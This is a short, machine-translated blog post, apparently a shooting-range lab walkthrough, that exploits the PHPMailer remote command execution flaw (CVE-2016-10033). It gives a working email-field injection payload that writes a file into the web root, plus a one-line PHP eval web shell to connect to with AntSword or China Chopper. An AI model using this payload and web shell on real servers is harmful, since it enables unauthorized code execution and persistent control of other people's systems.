当前位置:网站首页>Moher College phpmailer remote command execution vulnerability tracing

Moher College phpmailer remote command execution vulnerability tracing

2022-07-04 07:44:00 Lyswbb

Click to visit after you get the shooting range

Tools

Share a gadget , Used to crawl related url       Link Gopher

You can see only one useful mail.php

  After entering, you will come to an email test page , Obviously, this is a function point

 phpmailer Introduce

PHPMailer It's a... For sending e-mail PHP Function package . Direct use PHP You can send , There is no need to build complex Email service . Related loopholes CVE Number (CVE-2016-10033)

burp Grab the bag , change email It's about payload by

"aaa". -OQueueDirectory=/tmp/. -X/var/www/html/1.php @aaa.com

change message It's about payload by

<?php @eval($_POST[cmd]);?>

 

  And then visit http://124.70.71.251:44768/1.php, Use ant sword or kitchen knife to connect

 

 

原网站

版权声明
本文为[Lyswbb]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/185/202207040739567323.html